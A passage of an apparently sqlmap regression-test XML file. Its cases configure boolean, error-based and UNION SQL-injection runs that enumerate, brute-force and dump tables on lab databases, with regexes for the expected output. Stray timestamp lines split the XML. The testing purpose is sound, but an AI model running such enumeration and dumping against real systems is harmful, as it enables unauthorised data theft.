<db value= "testdb" />
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "r'Database: public.+Table: users.+3 columns.+surname.+bpchar'" />
<item value= "r'Database: public.+Table: users.+3 entries.+fluffy.+bunny.+wu.+ming'" />
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded custom enumeration - substring" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<dumpTable value= "True" />
<db value= "testdb" />
<tbl value= "users" />
<firstChar value= "3" />
<lastChar value= "5" />
</switches>
<parse >
2013-01-22 16:34:11 +04:00
<item value= "r'fetching number of entries for table .+retrieving the length of query output\n[\r]*\[.+?\] \[INFO\] retrieved: [\d]+'" console_output= "True" />
2013-01-14 05:11:57 +04:00
<item value= "r'Database: public.+Table: users.+5 entries.+the | iss.+<blank> | mei'" />
</parse>
</case>
2013-01-15 18:59:15 +04:00
<case name= "Oracle error-based multi-threaded custom enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<getSchema value= "True" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-15 18:59:15 +04:00
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
2013-01-18 13:32:05 +04:00
<item value= "r'Database: HR.+Table: JOBS.+4 columns.+MIN_SALARY.+NUMBER'" />
2013-01-16 19:13:47 +04:00
<item value= "r'Database: SYS.+Table: USERS.+3 entries.+fluffy.+bunny.+wu.+ming'" />
2013-01-15 18:59:15 +04:00
</parse>
</case>
<case name= "Oracle UNION query multi-threaded custom enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<getSchema value= "True" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-15 18:59:15 +04:00
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
2013-01-18 13:32:05 +04:00
<item value= "r'Database: HR.+Table: JOBS.+4 columns.+MIN_SALARY.+NUMBER'" />
2013-01-16 19:13:47 +04:00
<item value= "r'Database: SYS.+Table: USERS.+3 entries.+fluffy.+bunny.+wu.+ming'" />
2013-01-15 18:59:15 +04:00
</parse>
</case>
<case name= "Oracle boolean-based multi-threaded custom enumeration - substring" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<dumpTable value= "True" />
2013-01-16 19:13:47 +04:00
<db value= "sys" />
2013-01-15 18:59:15 +04:00
<tbl value= "users" />
<firstChar value= "3" />
<lastChar value= "5" />
</switches>
<parse >
2013-01-22 16:34:11 +04:00
<item value= "r'fetching number of entries for table .+retrieving the length of query output\n[\r]*\[.+?\] \[INFO\] retrieved: [\d]+'" console_output= "True" />
2013-01-16 19:13:47 +04:00
<item value= "r'Database: SYS.+Table: USERS.+5 entries.+the | iss.+<blank> | mei'" />
2013-01-15 18:59:15 +04:00
</parse>
</case>
2013-01-19 00:37:20 +04:00
<case name= "IBM DB2 boolean-based multi-threaded custom enumeration - substring" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<dumpTable value= "True" />
<db value= "db2inst1" />
<tbl value= "users" />
<firstChar value= "3" />
<lastChar value= "5" />
</switches>
<parse >
2013-01-22 16:34:11 +04:00
<item value= "r'fetching number of entries for table .+retrieving the length of query output\n[\r]*\[.+?\] \[INFO\] retrieved: [\d]+'" console_output= "True" />
2013-01-19 00:37:20 +04:00
<item value= "r'Database: DB2INST1.+Table: USERS.+5 entries.+the | iss.+NULL | mei'" />
</parse>
</case>
2013-01-14 20:50:24 +04:00
<case name= "SQLite UNION query multi-threaded custom enumeration" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<getSchema value= "True" />
<dumpTable value= "True" />
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 columns.+surname.+TEXT'" />
<item value= "r'Database: SQLite_masterdb.+Table: users.+3 entries.+fluffy.+bunny.+wu.+ming'" />
</parse>
</case>
<case name= "SQLite boolean-based multi-threaded custom enumeration - substring" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<dumpTable value= "True" />
<tbl value= "users" />
<firstChar value= "3" />
<lastChar value= "5" />
</switches>
<parse >
2013-01-22 16:34:11 +04:00
<item value= "r'fetching number of entries for table .+retrieving the length of query output\n[\r]*\[.+?\] \[INFO\] retrieved: [\d]+'" console_output= "True" />
2013-01-14 20:50:24 +04:00
<item value= "r'Database: SQLite_masterdb.+Table: users.+5 entries.+the | iss.+<blank> | mei'" />
</parse>
</case>
2013-01-22 17:00:15 +04:00
<case name= "Firebird UNION query multi-threaded custom enumeration" >
2013-01-22 16:34:11 +04:00
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<getSchema value= "True" />
<dumpTable value= "True" />
<tbl value= "users" />
<limitStart value= "2" />
<limitStop value= "4" />
<excludeSysDbs value= "True" />
</switches>
<parse >
2013-01-22 17:00:15 +04:00
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+3 columns.+SURNAME.+VARCHAR'" />
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+3 entries.+fluffy.+bunny.+wu.+ming'" />
2013-01-22 16:34:11 +04:00
</parse>
</case>
2013-01-22 17:00:15 +04:00
<case name= "Firebird boolean-based multi-threaded custom enumeration - substring" >
2013-01-22 16:34:11 +04:00
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<dumpTable value= "True" />
<tbl value= "users" />
<firstChar value= "3" />
<lastChar value= "5" />
</switches>
<parse >
<item value= "r'fetching number of entries for table .+retrieving the length of query output\n[\r]*\[.+?\] \[INFO\] retrieved: [\d]+'" console_output= "True" />
2013-01-22 17:00:15 +04:00
<item value= "r'Database: Firebird_masterdb.+Table: USERS.+5 entries.+the .+| iss.+ | mei'" />
2013-01-22 16:34:11 +04:00
</parse>
</case>
2012-12-18 19:59:48 +04:00
<!-- End of custom enumeration switches -->
2013-01-23 19:54:58 +04:00
<!-- Brute force switches -->
<case name= "MySQL boolean-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Current database.+2 tables.+data.+users'" />
</parse>
</case>
<case name= "MySQL boolean-based brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<db value= "testdb" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Database: testdb.+2 tables.+data.+users'" />
</parse>
</case>
<case name= "MySQL error-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Current database.+2 tables.+data.+users'" />
</parse>
</case>
<case name= "MySQL error-based brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<db value= "testdb" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Database: testdb.+2 tables.+data.+users'" />
</parse>
</case>
<case name= "MySQL UNION query brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Current database.+2 tables.+data.+users'" />
</parse>
</case>
<case name= "MySQL UNION query brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<db value= "testdb" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Database: testdb.+2 tables.+data.+users'" />
</parse>
</case>
<case name= "PostgreSQL boolean-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 17:15:48 +04:00
<item value= "r'Current database.+2 tables.+users'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "PostgreSQL boolean-based brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<db value= "public" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Database: public.+1 table.+users'" />
</parse>
</case>
<case name= "PostgreSQL error-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 17:15:48 +04:00
<item value= "r'Current database.+2 tables.+users'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "PostgreSQL error-based brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<db value= "public" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Database: public.+1 table.+users'" />
</parse>
</case>
<case name= "PostgreSQL UNION query brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 17:15:48 +04:00
<item value= "r'Current database.+2 tables.+users'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "PostgreSQL UNION query brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<db value= "public" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Database: public.+1 table.+users'" />
</parse>
</case>
<case name= "Oracle boolean-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 18:23:55 +04:00
<item value= "r'Current database.+6 tables.+USERS'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "Oracle boolean-based brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<db value= "sys" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 18:23:55 +04:00
<item value= "r'Database: SYS.+6 tables.+USERS'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "Oracle error-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 18:23:55 +04:00
<item value= "r'Current database.+6 tables.+USERS'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "Oracle error-based brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<db value= "sys" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 18:23:55 +04:00
<item value= "r'Database: SYS.+6 tables.+USERS'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "Oracle UNION query brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 18:23:55 +04:00
<item value= "r'Current database.+6 tables.+USERS'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "Oracle UNION query brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/oracle/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<db value= "sys" />
<commonTables value= "True" />
</switches>
<parse >
2013-02-18 18:23:55 +04:00
<item value= "r'Database: SYS.+6 tables.+USERS'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "IBM DB2 boolean-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<commonTables value= "True" />
</switches>
<parse >
2013-01-23 20:22:01 +04:00
<item value= "r'Current database.+1 table.+users'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "IBM DB2 boolean-based brute-force tables enumeration - provided database" >
<switches >
<url value= "http://debiandev/sqlmap/db2/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<db value= "db2inst1" />
<commonTables value= "True" />
</switches>
<parse >
2013-01-23 20:57:51 +04:00
<item value= "r'Database: DB2INST1.+1 table.+users'" />
2013-01-23 19:54:58 +04:00
</parse>
</case>
<case name= "SQLite 3 boolean-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_3.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Current database.+1 table.+users'" />
</parse>
</case>
<case name= "SQLite 3 UNION query brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/sqlite/get_int_3.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Current database.+1 table.+users'" />
</parse>
</case>
<case name= "Firebird boolean-based brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Current database.+1 table.+users'" />
</parse>
</case>
<case name= "Firebird UNION query brute-force tables enumeration - provided no database" >
<switches >
<url value= "http://debiandev/sqlmap/firebird/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<commonTables value= "True" />
</switches>
<parse >
<item value= "r'Current database.+1 table.+users'" />
</parse>
</case>
2013-01-23 20:57:51 +04:00
<!-- TODO: add test cases to brute - force columns -->
2013-01-23 19:54:58 +04:00
<!-- End of brute force switches -->
2012-12-18 19:59:48 +04:00
<!-- Search enumeration switches -->
<case name= "MySQL boolean-based multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "e" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] information_schema.+\[\*\] testdb'" />
</parse>
</case>
<case name= "MySQL error-based multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "e" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] information_schema.+\[\*\] testdb'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "e" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] information_schema.+\[\*\] testdb'" />
</parse>
</case>
2012-12-18 20:13:38 +04:00
<case name= "MySQL boolean-based multi-threaded search enumeration - tables given database" >
2012-12-18 19:59:48 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "testdb" />
2012-12-19 16:33:37 +04:00
<tbl value= "foo,se,bar" />
2012-12-18 19:59:48 +04:00
</switches>
<parse >
2012-12-19 16:33:37 +04:00
<item value= "r'Database: testdb.+1 table.+users'" />
2012-12-18 19:59:48 +04:00
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
2012-12-18 20:13:38 +04:00
<case name= "MySQL error-based multi-threaded search enumeration - tables given database" >
2012-12-18 19:59:48 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "testdb" />
2012-12-19 16:33:37 +04:00
<tbl value= "foo,se,bar" />
2012-12-18 19:59:48 +04:00
</switches>
<parse >
2012-12-19 16:33:37 +04:00
<item value= "r'Database: testdb.+1 table.+users'" />
2012-12-18 19:59:48 +04:00
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
2012-12-18 20:13:38 +04:00
<case name= "MySQL UNION query multi-threaded search enumeration - tables given database" >
2012-12-18 19:59:48 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "testdb" />
2012-12-19 16:33:37 +04:00
<tbl value= "foo,se,bar" />
2012-12-18 19:59:48 +04:00
</switches>
<parse >
2012-12-19 16:33:37 +04:00
<item value= "r'Database: testdb.+1 table.+users'" />
2012-12-18 19:59:48 +04:00
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
2012-12-18 20:13:38 +04:00
<case name= "MySQL boolean-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2012-12-19 16:33:37 +04:00
<item value= "r'Database: testdb.+1 table.+users.+Database: mysql.+1 table.+user '" />
2012-12-18 20:13:38 +04:00
</parse>
</case>
<case name= "MySQL error-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2012-12-19 16:33:37 +04:00
<item value= "r'Database: testdb.+1 table.+users.+Database: mysql.+1 table.+user '" />
2012-12-18 20:13:38 +04:00
</parse>
</case>
<case name= "MySQL UNION query multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
2012-12-19 16:33:37 +04:00
<item value= "r'Database: testdb.+1 table.+users.+Database: mysql.+1 table.+user '" />
2012-12-18 20:13:38 +04:00
</parse>
</case>
<case name= "MySQL boolean-based multi-threaded search enumeration - column without given db or table" >
2012-12-18 19:59:48 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<col value= "name" />
<excludeSysDbs value= "True" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+surname'" />
</parse>
</case>
2012-12-18 20:13:38 +04:00
<case name= "MySQL error-based multi-threaded search enumeration - column without given db or table" >
2012-12-18 19:59:48 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<col value= "name" />
<excludeSysDbs value= "True" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
</parse>
</case>
2012-12-18 20:13:38 +04:00
<case name= "MySQL UNION query multi-threaded search enumeration - column without given db or table" >
2012-12-18 19:59:48 +04:00
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<col value= "name" />
<excludeSysDbs value= "True" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
</parse>
</case>
2012-12-18 20:13:38 +04:00
<case name= "MySQL boolean-based multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "mysql,testdb" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+surname'" />
<item value= "r'Database: mysql.+Table: plugin.+1 column.+name'" />
</parse>
</case>
<case name= "MySQL error-based multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "mysql,testdb" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
<item value= "r'Database: mysql.+Table: plugin.+1 column.+name.+char\(64\)'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "mysql,testdb" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
<item value= "r'Database: mysql.+Table: plugin.+1 column.+name.+char\(64\)'" />
</parse>
</case>
2012-12-18 20:30:46 +04:00
<case name= "MySQL boolean-based multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "users,plugin" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+surname'" />
<item value= "r'Database: mysql.+Table: plugin.+1 column.+name'" />
</parse>
</case>
<case name= "MySQL error-based multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<tbl value= "users,plugin" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
<item value= "r'Database: mysql.+Table: plugin.+1 column.+name.+char\(64\)'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded search enumeration - column given tables" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<tbl value= "users,plugin" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
<item value= "r'Database: mysql.+Table: plugin.+1 column.+name.+char\(64\)'" />
</parse>
</case>
<case name= "MySQL boolean-based multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "mysql,testdb" />
<tbl value= "users" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+surname'" />
</parse>
</case>
<case name= "MySQL error-based multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "mysql,testdb" />
<tbl value= "users" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
</parse>
</case>
<case name= "MySQL UNION query multi-threaded search enumeration - column given databases and table" >
<switches >
<url value= "http://debiandev/sqlmap/mysql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "mysql,testdb" />
<tbl value= "users" />
<col value= "name" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: testdb.+Table: users.+2 columns.+name.+varchar\(500\).+surname.+varchar\(1000\)'" />
</parse>
</case>
2013-01-14 05:11:57 +04:00
<case name= "PostgreSQL boolean-based multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "te" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] template0.+\[\*\] testdb'" />
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "te" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] template0.+\[\*\] testdb'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded search enumeration - database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "te" />
</switches>
<parse >
<item value= "r'found databases.+:.+\[\*\] template0.+\[\*\] testdb'" />
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded search enumeration - tables given database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<db value= "public" />
<tbl value= "foo,se,bar" />
</switches>
<parse >
<item value= "r'Database: public.+1 table.+users'" />
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded search enumeration - tables given database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<db value= "public" />
<tbl value= "foo,se,bar" />
</switches>
<parse >
<item value= "r'Database: public.+1 table.+users'" />
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded search enumeration - tables given database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<db value= "public" />
<tbl value= "foo,se,bar" />
</switches>
<parse >
<item value= "r'Database: public.+1 table.+users'" />
<item value= "r'.+5 entries.+wu.+nameisnull'" />
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: pg_catalog.+1 table.+pg_user_mapping.+Database: public.+1 table.+users'" />
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: pg_catalog.+1 table.+pg_user_mapping.+Database: public.+1 table.+users'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded search enumeration - tables without given database" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<tbl value= "user" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: pg_catalog.+1 table.+pg_user_mapping.+Database: public.+1 table.+users'" />
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded search enumeration - column without given db or table" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
<col value= "name" />
<excludeSysDbs value= "True" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: public.+Table: users.+2 columns.+name.+surname'" />
</parse>
</case>
<case name= "PostgreSQL error-based multi-threaded search enumeration - column without given db or table" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "E" />
<search value= "True" />
<col value= "name" />
<excludeSysDbs value= "True" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: public.+Table: users.+2 columns.+name.+bpchar.+surname.+bpchar'" />
</parse>
</case>
<case name= "PostgreSQL UNION query multi-threaded search enumeration - column without given db or table" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "U" />
<search value= "True" />
<col value= "name" />
<excludeSysDbs value= "True" />
<answers value= "do you want to dump=N" />
</switches>
<parse >
<item value= "r'Database: public.+Table: users.+2 columns.+name.+bpchar.+surname.+bpchar'" />
</parse>
</case>
<case name= "PostgreSQL boolean-based multi-threaded search enumeration - column given databases" >
<switches >
<url value= "http://debiandev/sqlmap/pgsql/get_int.php?id=1" />
<threads value= "4" />
<tech value= "B" />
<search value= "True" />
